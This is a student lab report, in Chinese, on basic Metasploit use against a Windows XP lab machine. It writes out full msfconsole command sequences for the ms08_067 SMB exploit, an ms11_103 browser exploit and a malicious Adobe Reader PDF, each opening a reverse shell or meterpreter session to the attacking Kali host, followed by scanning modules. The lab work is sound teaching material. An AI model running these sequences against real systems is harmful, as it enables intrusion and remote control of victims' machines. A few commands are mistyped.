1. 程式人生 > >20155328 網絡攻防 實驗五:MSF基礎應用

20155328 網絡攻防 實驗五:MSF基礎應用

RM AD sta format mage 設定 -o name com

20155328 網絡攻防 實驗五:MSF基礎應用

實踐內容及過程記錄

一、Windows服務滲透攻擊————ms08_067

攻擊機:kali

靶機:WindowsXP(英文版)

第一步,分別查看攻擊機和靶機的IP。
技術分享圖片

技術分享圖片

在kali終端中,輸入msfconsole進入msf控制臺,依次輸入以下指令:

use exploit/windows/smb/ms08_067_netapiuse exploit/windows/smb/ms08_067_netapi

show payloads

set payload generic/shell_reverse_tcp

set LHOST 192.168.127.138

set LPORT 5328

set RHOST 192.168.127.139

set target 0

exploit

技術分享圖片

攻擊成功,可以看到已經獲取了靶機的系統信息:

技術分享圖片

二、瀏覽器滲透攻擊————ms11_103

在kali終端輸入msfconsole打開msf控制臺,輸入以下參數:

技術分享圖片

被攻擊的主機可以看到網頁無法正常打開:

技術分享圖片

回到kali,輸入以下指令:

sessions
sessions -i n//n為顯示的最大進程號

可以看到攻擊成功了。
技術分享圖片

三、針對Adobe Reader的滲透攻擊

在kali中進入msf控制臺,輸入以下指令:

use windows/fileformat/adobe)cooltype_sing
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.127.139
set LPORT 5328
set FILENAME 20155328.pdf
exploit

生成了PDF:
技術分享圖片

將生成的PDF拷貝到靶機上。

kali中輸入back,進入監聽模塊,輸入以下命令:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.127.139
set LPORT 5328
exploit

技術分享圖片

然後在靶機上打開PDF:

技術分享圖片

攻擊機顯示攻擊成功:

技術分享圖片

四、應用Aux輔助模塊

1.browser_info

在kali終端中輸入show auxiliary,查看aux中都有哪些模塊,最後選中gather/browser_info。

進入到msf控制臺後,依次輸入以下命令:

use auxiliary/gather_browser_info

set SRVHOST 192.168.127.138 //kali的IP

set SRVPORT 5328

exploit

可以看到生成了URL,且Server Start。
技術分享圖片

復制鏈接,在靶機(WindowsXP)中進行訪問:

技術分享圖片

回到kali,可以看到已經獲取了靶機訪問該url的瀏覽器信息。

技術分享圖片

2.arp_sweep

先在kali終端中輸入以下命令,手動創建一個msf所需的數據庫:

service postgresql start
msfdb start

再輸入msfconsole開啟msf,輸入命令use auxiliary/scanner/discovery/arp_sweep進入模塊,設置參數:(RHOSTS填寫kali所在的網段)
技術分享圖片

設定好了以後輸入run,可以看到除了自己主機IP外,還有三個其他IP:

技術分享圖片

在msf中輸入命令db_nmap -O 192.168.127.139(靶機IP),可以看到開啟的端口號即靶機的目標操作系統。
技術分享圖片

基礎問題回答

用自己的話解釋什麽是exploit,payload,encode。

exploit:利用漏洞或一切可利用的東西進行獲取用戶權限、篡改文件信息等操作。

payload:在靶機上執行的一段代碼,可以反彈連接。

encode:對特征碼進行編碼,改變特征碼。

實踐總結與體會

這次實驗主要是做的小模塊比較多,感覺還。。挺厲害的。。再接再厲吧。

20155328 網絡攻防 實驗五:MSF基礎應用